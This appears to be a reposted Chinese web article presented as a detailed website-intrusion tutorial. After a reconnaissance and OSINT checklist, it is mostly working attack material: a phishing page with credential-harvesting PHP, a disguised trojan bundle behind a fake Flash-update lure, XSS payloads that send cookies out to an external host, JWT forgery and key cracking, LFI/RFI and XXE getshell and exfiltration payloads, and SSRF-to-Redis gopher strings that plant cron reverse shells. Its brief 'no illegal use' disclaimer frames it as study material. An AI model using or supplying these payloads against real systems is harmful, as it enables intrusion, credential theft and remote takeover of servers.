站内公告: |
时间:2021-01-30 点击: 次 来源:网络 作者:小乐 - 小 + 大
黑客怎么入侵网站之讲解黑客入侵技巧及方法(一) 一篇最详细的网站入侵渗透测试中文文章 新手可根据自身情况模拟渗透测试,本地渗透测试环境搭建论坛也有说。希望大家好好学习 为维护网络安全贡献自身的一份力量,下面的教程非常非常详细 可能是你这辈子看过最长的技术文章哈哈哈,但你认真看,就会发现收获很多!来自于大佬发表可以让我知道一些不知道的思路及技巧和比较好用的工具运用主要是思路哈,严禁违法使用,直线与交流和学习!!!域名历史IP https://x.thrXXXbook.cn/ 网站架构/服务器指纹/CMS识别/容器 Whatweb 网页源代码 请求头/响应头 网站底部,顶部,左上角右上角 网站报错信息 http://www.yunsee.cn/ 域名/install Firefox插件Wappalyzer CMS漏洞 定位版本对应已知漏洞检查 CMS未知漏洞挖掘 Web容器已知漏洞(解析漏洞这种) 显示网站使用的技术 https://builtwith.com/ 中间件、组件 Weblogic、tomcat、zabbix、struts、axis等 https://github.com/FortyNorthSecurity/EyeWitness 子域名 ![]() 老站、同样架构或同源码的子站 爆破,接口查询 https://phpinfo.me/domain/ https://d.chinacycc.com/index.php?m=Login&a=index subDomainBrute、knockpy OWA发现、dig adfs、dig mail https://dns.bufferover.run/dns?q=baidu.com http://api.hackertarget.com/reversedns/?q=target.com 网站使用的CMS的官方demo站 找不到demo就找源码开发者,加群什么的,结合社会工程学要个后台截图(对于一些后台目录复杂的cms),注意看网站上一些功能介绍的截图。 SSL证书信息 https://crt.sh/?q=%25.target.com https://censys.io/certificates?q=target.com https://github.com/cheetz/sslScrape DNS历史解析记录 https://dnsdumpster.com/ https://censys.io/ https://securitytrails.com/ 域传送漏洞检查 Dnsenum、fierce http://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com $ ./fierce.pl –dns example.com –wordlist myWordList.txt >dig @ns.example.com example=.com AXFR >nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器 >nslookup #进入nslookup交互模式 >server dns.domian.com #指定dns服务器 >ls xxx.yyy.cn #列出域信息 同服站点情况 https://site.ip138.com/ 火狐插件flagfox,配置单击指向bing查ip对应的域名 同样架构或源码的站 网站js https://github.com/003random/getJS https://github.com/Threezh1/JSFinder 或浏览器F12也可以看到加载的 敏感信息、可能存在漏洞的参数等信息 查看网页源代码,注释的一些信息,比如没有删掉的接口、前台没有的页面、越权、注入、js等 网站使用的第三方js 云信息 Aliyun、AWS、GCP、Azure等 查找可公开访问的实例 https://github.com/gwen001/s3-buckets-finder https://github.com/nccgroup/aws-inventory https://github.com/jordanpotti/AWSBucketDump APP反编译 url、js、osskey、api等信息查找 搜集到接口该怎么做 Fuzz常见参数 C段/B段信息 Banner、是否存在目标的后台或其他入口/其他业务系统 工具 recon-ng,theharvester,maltego,exiftool等 https://www.spiderfoot.net/ https://github.com/smicallef/spiderfoot 端口对外开放情况 Masscan、scanport等 针对常见的那些端口的利用的常规方法 常见的未授权访问的服务如redis,mongodb等 目录扫描/爬虫(慎用) WAF情况识别 https://github.com/EnableSecurity/wafw00f 做好绕过策略的计划 随手测试 单引号 xx.jpg/.php admin/123456 万能密码 Heartbleed漏洞 搜索引擎 Google自定义搜索引擎整合的300多个社交网站 https://cse.google.com/cse?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:iyxger-cwug&q=%22%22 Google自定义搜索引擎整合的文件共享网站 https://cse.google.com/cse/publicurl?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:hn5bcrszfhe&q=%22%22 领英用户提取 https://cse.google.com/cse?cx=001394533911082033616:tm5y1wqwmme Shodan/fofa/zoomeye Google dorks Site,filetype,intitle,inurl,intext等 信息泄露 电话、邮箱,姓名 目录遍历 备份文件 (www.zip,xx.com.zip,www.xx.com.zip,wwwroot.zip) .svn/.git/sql/robots/crossdomin.xml/DS_Store等 https://github.com/lijiejie/ds_store_exp https://github.com/admintony/svnExploit 若是论坛ID=1的用户名一般为管理、或查看帖子信息、生成字典 网页上客服的QQ(先判断是企业的还是个人,用处有时不太大,看怎么用,搞个鱼叉什么的) 网页缓存 http://www.cachedpages.com/ 图片反查 百度识图、googleimage、tineye 原图查询坐标 社交 QQ、weibo、支付宝、脉脉、领英、咸鱼、短视频、人人、贴吧、论坛 外网信息 有些人喜欢把自己的生活传到外网 推特、ins、fb等 手机号加入通讯录匹配各个APP用户信息 注册过的网站 https://www.reg007.com/ https://www.usersearch.org/ 目标人员的兴趣 目标人员的兴趣 注册过的小众论坛,站点 针对此类站点的深入 收集到的用户名,电话等信息生成字典 邮箱搜集 https://hunter.io/ https://github.com/killswitch-GUI/SimplyEmail Exchange https://github.com/dafthack/MailSniper 验证邮箱是否存在 https://tools.verifyemailaddress.io/ 历史泄露过的资料等 库 https://haveibeenpwned.com/ https://github.com/kernelmachine/haveibeenpwned Github/Gitee等代码托管平台 https://github.com/dxa4481/truffleHog https://github.com/lijiejie/GitHack https://github.com/MiSecurity/x-patrol https://github.com/az0ne/Github_Nuggests https://github.com/mazen160/GithubCloner克隆用户的github 被入侵网址列表 http://zone-h.org/archive wooyun镜像查找目标企业曾出现的漏洞 GPS查询 https://www.opengps.cn/Default.aspx 网站URL提取 http://www.bulkdachecker.com/url-extractor/ 蜜罐判断(参考一下即可) https://honeyscore.shodan.io/ 默认密码 https://default-password.info/ http://routerpasswords.com 如需注册 Sms https://www.materialtools.com/ http://receivefreesms.com/ https://10minutemail.net/ https://zh.mytrashmailer.com/ http://24mail.chacuo.net/enus https://www.linshiyouxiang.net/ Fake id https://www.fakenamegenerator.com/ http://www.haoweichi.com/ https://www.fakeaddressgenerator.com/ 企业信息 天眼查、企查查、企业信用信息公示系统 企业邮箱收集,企业架构画像、人员统计、人员职责、部门、WiFi、常用部门密码、人员是否泄露过密码、人员平时爱逛的站点、OA/erp/crm/sso/mail/vpn等入口、网络安全设备(waf,ips,ids,router等统计)、内部使用的代码托管平台(gitlab、daocloud等),bug管理平台、服务器域名资产统计 入口点 win10 安装kali(wsl) Microsoft Store查找kali下载。 Powershell执行 >Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux 源设置vim /etc/apt/source.list deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free >sudo su >passwd root修改root密码 >apt-get update &apt-get upgrade 更新 >apt-get dist-upgrade >apt-get clean cmd>kali config --default-user root 设置默认启动用户为root cmd>net stop/start LxssManager重启服务 >apt-get install metasploit-framework >apt install kali-linux-full 安装完整kali工具集 水坑攻击 XSS克隆钓鱼 保存js&css到服务器,登录action改为接受密码的文件action="./pass.php" <?php //php $user=$_POST['username']; $pass=$_POST['password']; $file=fopen('pass.txt','a+'); fwrite($file,$user."|"."pass" . "\n"); fclose($file); echo "<script>window.location.href=\"http://192.168.0.1\"</script>\n"; ?> 构造payload <script>window.location.href="http://192.168.0.1/login.html"</script> php –S 0.0.0.0:8080 –t ./ 伪造页面钓鱼 1 https://github.com/r00tSe7en/Fake-flash.cn 添加xss平台模块 window.alert = function(name){ var iframe = document.createElement("IFRAME"); iframe.style.display="none"; iframe.setAttribute("src",'data:text/plain'); document.documentElement.appendChild(iframe); window.frames[0].window.alert(name); iframe.parentNode.removeChild(iframe); } alert("您的FLASH版本过低,尝试升级后访问该页面!"); window.location.href="http://www.flash.com"; 制作自解压捆绑 一个马.exe,一个正常exe,全选,winrar添加到压缩文件,选择创建自解压格式压缩文件,高级->自解压选项,设置解压路径,c:\windows\temp\,设置->解压后运行两个exe文件,模式全部隐藏,更新,解压并更新文件,覆盖所有文件。 ResourceHacker修改文件图标 2 if(empty($_COOKIE['flash'])){ echo '<script>alert("你当前计算机的Flash软件已经很久未更新,将导致无法正常显示界面内容,请下载安装最新版本!");window.location="http://www.flash.cn.xx.com/"</script>'; setcookie("flash","true",time()+30*2400); } 对外服务攻击 Web 前端/逻辑漏洞 注册 任意用户注册 可爆破用户名 注入 XSS 登录 爆破用户名,密码 注入 万能密码 Xss Xss+Csrf 修改返回包信息,登入他人账户 修改cookie中的参数,如user,adminid等 任意密码重置 1.重置一个账户,不发送验证码,设置验证码为空发送请求。 2.发送验证码,查看相应包 3.验证码生存期的爆破 4.修改相应包为成功的相应包 5.手工直接跳转到校验成功的界面 6.两个账户,重置别人密码时,替换验证码为自己正确的验证码 7.重置别人密码时,替换为自己的手机号 8.重置自己的成功时,同意浏览器重置别人的,不发验证码 9.替换用户名,ID,cookie,token参数等验证身份的参数 10.通过越权修改他人的找回信息如手机/邮箱来重置 信息泄露 HTML源码、JS等查看信息搜集一章 后台 登录参数修改为注册参数/reg、/register、/sign等 JWT攻击手法 https://jwt.io/#debugger-io 未校验签名 将原JWT串解码后修改用户名等身份认证的地方,生成新token发送请求 禁用哈希 image Alg代表加密方式,修改用户名等身份认证的地方,把HS256设置为none生成token发送请求,使用python的pyjwt模块 image jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key='') 暴破弱密钥 >pip3 install pyjwt >python3 crack.py import jwt import termcolor jwt_str = R'token' with open('/root/password.txt') as f: for line in f: key_ = line.strip() try: jwt.decode(jwt_str,verify=True,key=key_) print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--') break except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError): print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--') except jwt.exceptions.InvalidSignatureError: print('\r',' ' * 64, '\r\btry',key_,end='',flush=True) continue else: print('\r','\bnot found.') XSS 打COOKIE <svg/onload="javascript:document.location.href=('http://xx.xx.xx.xx:7777?cookie='+document.cookie)"> 读取HTML <svg/onload="document.location='http://xx.xx.xx.xx:7777/?'+btoa(document.body.innerHTML)"> 读文件 <svg/onload=" xmlhttp=new XMLHttpRequest(); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.location='http://xx.xx.xx.xx:7777/?'+btoa(xmlhttp.responseText); } } xmlhttp.open("GET","file.php",true); xmlhttp.send(); "> XSS+SSRF读取服务器文件 <svg/onload=" xmlhttp=new XMLHttpRequest(); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { document.location='http://vps_ip:23333/?'+btoa(xmlhttp.responseText); } } xmlhttp.open("POST","request.php",true); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xmlhttp.send("url=file:///etc/passwd"); "> CSRF 查看有无token等验证身份的参数,删掉后是否返回正常 查看header中referer,origin参数,删掉后是否返回正常 使用csrftester/burpsuite生成表单,以另一账号和浏览器打开测试 去掉referer中域名后面的文件夹或文件 替换二级域名 php任意文件读取/下载 readfile()、file_get_contents()、fopen()等读文件的函数不严谨,读取文件路径可控,输出内容。 下载配置文件 Redis、Weblogic、ftp、mysql、web配置文件、history文件、数据库配置文件 下载log文件 下载web文件 /1.php?f=../../etc/passwd /1.php?f=file:///etc/passwd(file://绕过../的防护) /1.php?f=file:///etc/passwd php文件包含 函数: include require include_once require_once 常用协议 file:// — 访问本地文件系统 file协议的工作目录是当前目录,使用file:///wwwroot/1.php等同于./wwwroot/1.php可用于绕过一些情况 php:// — 访问各个输入/输出流(I/O streams) image 读取 /1.php?file=php://filter/read=convert.base64-encode/resource=./1.php 写入 /1.php?file=php://filter/write=convert.base64-decode/resource=[file]","base64 Getshell https://github.com/D35m0nd142/LFISuite allow_url_include 开启时Getshell 远程文件包含 /1.php?file=http://remote.com/shell.txt /1.php?file=php://input POST:<?php phpinfo();?> 或使用curl >curl -v "http://127.0.0.1:8888/ctf/cli/3.php?file=php://input" -d "<?php phpinfo();?>" 或使用data://协议解析base64的代码 /1.php?file=data://text/plain;base64,PD9waHAgIHBocGluZm8oKTs/Pg== allow_url_include 关闭时Getshell 攻击机开启共享 /1.php?file=//attacker/1.php 创建webdav服务,shell文件放入目录包含即可 >docker run -v /root/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav Shell文件放入/root/webdav/data /1.php?file=//attacker/1.php 包含日志文件getshell Fuzz文件 https://github.com/fuzzdb-project/fuzzdb https://github.com/danielmiessler/SecLists https://blog.csdn.net/qq_33020901/article/details/78810035 /1.php?file=<?php phpinfo();?> /1.php?file=../../../../../../../var/log/apache2/access.log Win下使用phpstudy 请求/<?php phpinfo();?> 包含错误日志 /1.php?file=C:\phpStudy\Apache\logs\error.log 上传个图片格式的木马直接包含 /1.php?file=/uploadfile/1.jpg 限制后缀时 <?php $file = $_GET['file'].".php"; include($file); ?><br> 利用伪协议zip,构造一个zip压缩包,打包一个shell.php,将压缩包更名为png image 请求/1.php?file=zip://shell.png%23shell image 也可使用phar协议访问 /1.php?file=phar://shell.png/shell 老版本可以使用%00截断 /etc/passwd%00 (需要 magic_quotes_gpc=off,PHP小于5.3.4有效) /var/www/%00 /etc/passwd/././././././.[…]/./././././. (需要 magic_quotes_gpc=off (php版本小于5.2.8(?)可以成功,linux需要文件名长于4096,windows需要长于256) 点号截断: /boot.ini/………[…]………… (php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于256) phpinfo-LFI 本地文件包含临时文件getshell 利用临时文件删除时间差获取shell 需要一个lfi漏洞+phpinfo页面 在/tmp/目录下生成个密码为f的一句话木马g image 修改脚本的phpinfo文件名称 image LFI文件 image 执行 >python getshell.py 192.168.0.108 80 100 80是端口、100是线程 image image http://192.168.0.110/index.php?file=../../../tmp/g&f=echo%20%271%27 session + lfi getshell session.upload_progress.enabled启用时,文件上传会产生进度文件 /var/lib/php5/sess_ /var/lib/php/sess_ LFI SSH Log >ssh '<?php system($_GET['c']); ?>'@192.168.0.107 >http://192.168.0.107/lfi.php?file=/var/log/auth.log&c=ls RFI&命令注入上线MSF MSF生成 #use exploit/multi/script/web_delivery #set target PHP 注入点注入: php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.107:1234/OgsOFaj3yKH'));" RFI: http://www.xx.com/file=http://192.168.0.107:1234/OgsOFaj3yKH ![]() XML XML设计的宗旨是传输数据,而非显示数据 XXE=XML外部实体注入、XML=可扩展标记语言 Xml文件声明 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> DTD为XML的文档类型定义 引入外部DTD <!DOCTYPE 根元素 SYSTEM "filename"> 参数实体+外部实体 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///etc/passwd"> %file; ]> XML注入 闭合标签,改写xml文件,用户可控,有拼接代码 <?xml version="1.0" encoding="utf-8"?> <manager> <admin id="1"> <username>admin</username> <password>admin</password> </admin> <admin id="2"> <username>root</username> <password>root</password> </admin> </manager> 若是password可控,拼接代码形成注入 admin </password></admin><admin id="3"><name>hack</name><password>hacker</password></admin> XXE https://github.com/AonCyberLabs/xxe-recursive-download 程序解析XML输入时,未禁止外部实体的加载,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害 判断 回显路径 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "test">%remote;]> DNSLOG http://www.dnslog.cn/ <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY dtd SYSTEM "http://xxx.dnslog.cn/xxe">]> <xxe>&dtd;</xxe> Webdav 存在webdav可使用PROPPATCH、PROPFIND、 LOCK等请求方法接受xml输入形成xxe Wsdl使用AWVS测试 挖掘 如遇与xml交互的地方 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY test "this is test"> ]> <root>&test;</root> 看是否输出 检查是否支持外部实体 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY % foo SYSTEM "http://attacker/evil.xml"> %foo; ]> 查看你的服务器是否有请求 JSON content-type XXE 修改Content-Type: application/xml X-Requested-With: XMLHttpRequest <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <参数name>name</参数name> <参数value>&xxe;</ 参数value> </root> 有回显读取本地文件 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [ <!ENTITY goodies SYSTEM "file:////etc/passwd"> ]> <creds>&goodies;</creds> 也可去掉文件列目录 file:///root/.sh/id_rsa 特殊字符 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:////tmp/xxx.txt"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd"> %dtd; ]> <roottag>&all;</roottag> evil.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY all "%start;%goodies;%end;"> Blind OOB XXE无回显读取 需使用参数实体,引用外部DTD Payload <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ip/test.dtd"> %remote;%int;%send; ]> test.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://attacker:9999?p=%file;'>"> 列目录 远程payload <!ENTITY % a SYSTEM "file:///"> <!ENTITY % b "<!ENTITY % c SYSTEM 'gopher://ip:80/%a;'>"> %b; %c; 注入payload <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker:80/1.xml">%remote;]><root/> 不同平台支持的协议 image 执行命令 安装expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令。 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <root> <name>&xxe;</name> </root> 内网主机探测 可先读取/etc/network/interfaces、/proc/net/arp、/etc/hosts等文件查询IP段 使用脚本 内网端口扫描 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data SYSTEM "http://127.0.0.1:515/" [ <!ELEMENT data (#PCDATA)> ]> <data>4</data> 可使用burpsuite的intruder模块进行遍历 内部DTD利用 Linux <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamsa 'Your DTD code'> %local_dtd; Windows <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'> %local_dtd; <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd; ]> <message>any text</message> XXE写shell 当XXE支持XSL时 <?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="C#" implements-prefix="user"> <![CDATA[ public string xml() { System.Net.WebClient webClient = new System.Net.WebClient(); webClient.DownloadFile("https://x.x.x.x/shell.txt", @"c:\inetpub\wwwroot\shell.aspx"); return "Exploit Success"; } ]]> </msxsl:script> <xsl:template match="/"> <xsl:value-of select="user:xml()"/> </xsl:template> </xsl:stylesheet> SSRF 定义 服务端请求伪造 构造一个由服务器发出请求的漏洞 服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制 成因 file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile()等函数使用不当会造成SSRF漏洞 挖掘 转码服务 在线翻译 获取超链接的标题等内容进行显示 请求远程服务器资源的地方,图片加载与下载(通过URL地址加载或下载图片) 图片、文章收藏功能 对外发起网络请求的地方,网站采集、网页抓取的地方。 头像 (远程加载头像) 一切要你输入网址的地方和可以输入ip的地方。 数据库内置功能(mongodb的copyDatabase函数) 邮件系统 文件处理 在线处理工具 从URL关键字中寻找:share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain XML <!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd"> <!ENTITY % file system "file:///etc/passwd" > <!ENTITY % d SYSTEM "http://wuyun.org/file?data=%file"> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://wuyun.org/urlin"> <xenc:AgreementMethod Algorithm= "http://wuyun.org/1"> <xenc:EncryptionProperty Target= "http://wuyun.org/2"> <xenc:CipherReference URI= "http://wuyun.org/3"> <xenc:DataReference URI= "http://wuyun.org/4"> <Reference URI="http://wuyun.org/5"> <To xmlns="http://www.w3.org/2005/08/addressing">http://wuyun.org/to</To> <ReplyTo xmlns="http://www.w3.org/2005/08/addressing"> <Address>http://wuyun.org/rto</Address> <input message="wooyun" wsa:Action="http://wuyun.org/ip" /> <output message="wooyun" wsa:Action="http://wuyun.org/op" /> <wsp:PolicyReference URI=“http://wuyun.org/pr"> <fed:Federation FederationID="http://wuyun.org/fid"> <fed:FederationInclude>http://wuyun.org/inc</fed:FederationInclude> <fed:TokenIssuerName>http://wuyun.org/iss</fed:TokenIssuerName> <mex:MetadataReference> <wsa:Address>http://wuyun.org/mex</wsa:Address> </mex:MetadataReference> <edmx:Reference URI="http://wuyun.org/edmxr"> <edmx:AnnotationsReference URI="http://wuyun.org/edmxa"> <xbrli:identifier scheme="http://wuyun.org/xbr"> <link:roleType roleURI="http://wuyun.org/role"> <stratml:Source>http://wuyun.org/stml</stratml:Source> 数据库 MongoDB db.copyDatabase('\r\nconfig set dbfilename ssrf\r\nquit\r\n’,'test','10.6.4.166:6379') PostgresSQL SELECT dblink_send_query( 'host=127.0.0.1 dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n' password=1 port=6379 sslmode=disable', 'select version();’ ); MSSQL SELECT openrowset('SQLOLEDB', 'server=192.168.1.5;uid=sa;pwd=sa;database=master') SELECT * FROM OpenDatasource('SQLOLEDB', 'Data Source=ServerName;User ID=sa;Password=sa' ) .Northwind.dbo.Categories 图片处理函数 FFmpeg concat:http://wyssrf.wuyun.org/header.y4m|file:///etc/passwd ImageMagick fill 'url(http://wyssrf.wuyun.org)' 攻击 测试代码,需安装phpcurl模块apt-get install php7.0-curl <?php echo 'r u ok?'; function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } $url = $_GET['url']; curl($url); ?> 对内网、本地进行端口扫描,获取服务的banner 信息 攻击运行在内网或本地的应用程序 对内网 WEB 应用进行指纹识别,通过访问默认文件实现(如:readme文件) 攻击内外网的 web 应用,主要是使用 GET 参数就可以实现的攻击(如:Struts2,sqli) 读取内网资源(如:利用file协议读取本地文件等) 跳板 无视cdn 利用Redis未授权访问,HTTP CRLF注入实现getshell 文件读取 >curl -v 'http://192.168.0.110/ssrf.php?url=file:///etc/passwd' image ?url=php://filter/read=convert.base64-encode/resource=./1.php 端口探测 >curl -v 'http://www.xx.com/ssrf.php?url=dict://127.0.0.1:22/' image >curl -v 'http://www.xx.com/ssrf.php?url=dict://127.0.0.1:6379/info' image SSRF+Redis >curl -v 'http://192.168.0.112/ssrf.php?url=gopher://192.168.0.120:6379/_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.0.108%2f12345%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a' image image 302反弹shell ?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=flushall 302.php <?php $ip = $_GET['ip']; $port = $_GET['port']; $scheme = $_GET['s']; $data = $_GET['data']; header("Location: $scheme://$ip:$port/$data"); ?> ?url=http://xxxx/reverse.php?s=dict&ip=10.20.*.*&port=6379&bhost=*.*.*.*&bport=1234 reverse.php <?php $ip = $_GET['ip']; $port = $_GET['port']; $bhost = $_GET['bhost']; $bport = $_GET['bport']; $scheme = $_GET['s']; header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\""); ?> ?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=config:set:dir:/var/spool/cron/ ?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=config:set:dbfilename:root ?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=save 可设置burp–>intruder指定变量跑。 Mysql https://github.com/FoolMitAh/mysql_gopher_attack https://fireshellsecurity.team/isitdtu-friss/ Weblogic SSRF+Redis 探测 /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:80 Redis反弹 set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/121.36.67.230/4444 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.0.110:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa SSRF+内网Struct2 http://www.xx.com/ssrf.php?url=http://10.1.1.1/action?action?redirect:http://attackerip/ Ueditor SSRF /editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png Discuz /forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo 探测存活主机 直接访问 http://www.xx.com/ssrf.php?url=http://192.168.0.1 image 伪造POST请求 >curl -v 'http://www.xx.com/ssrf.php?url=gopher://192.168.0.10:80/_POST%20/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb' 绕过方法 本地绕过 http://127.0.0.1=http://localhost [::]绕过 http://[::]:80=http://127.0.0.1 @绕过 http://www.xx.com/1.php?url=http://www.xx.com@127.0.0.1:8080 利用短网址 http://tool.chinaz.com/tools/dwz.aspx http://dwz.cn/ DNS解析 http://www.qq.com.127.0.0.1.xip.io,可解析为127.0.0.1 自己域名设置A记录,指向127.0.0.1 进制转换 127.0.0.1 八进制:0177.0.0.1 十六进制:0x7f.0.0.1 十进制:2130706433 http://www.bejson.com/convert/ip2int/ 句号 127。0。0。1 302脚本 <?php $ip = $_GET['ip']; $port = $_GET['port']; $scheme = $_GET['s']; $data = $_GET['data']; header("Location: $scheme://$ip:$port/$data"); ?> 攻击方VPS监听8080 dict协议 dict://www.attack.com:8080/hello:dict等于 ssrf.php?url=http://attack.com/302.php?s=dict&ip=www.attack.com&port=8080&data=hello:dict Gopher协议 gopher:// www.attack.com:8080/gopher ssrf.php?url=http://attack.com/302.php?s=gopher&ip=www.attack.com&port=8080&data=gopher File协议 攻击机新建file.php <?php header("Location: file:///etc/passwd"); ?> ssrf.php?url=http://attack.com/file.php gopher协议的脚本转换 抓取本地测试的正常请求 >socat -v tcp-listen:4444,fork tcp-connect:目标IP:6379 image image 将捕获日志保存txt 使用脚本转换为支持gopher协议的字符串 转换规则 如果第一个字符是>或者< 那么丢弃该行字符串,表示请求和返回的时间。 如果前3个字符是+OK 那么丢弃该行字符串,表示返回的字符串。 将\r字符串替换成%0d%0a 空白行替换为%0a image 本地可执行 image 远程执行需对空格进行编码后再url编码一次 *3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$63%0d%0a%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/192.168.0.108/12138%200>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a image image image 协议 Curl版本需低于7.15.1 file:可回显时,使用file读取任意文件 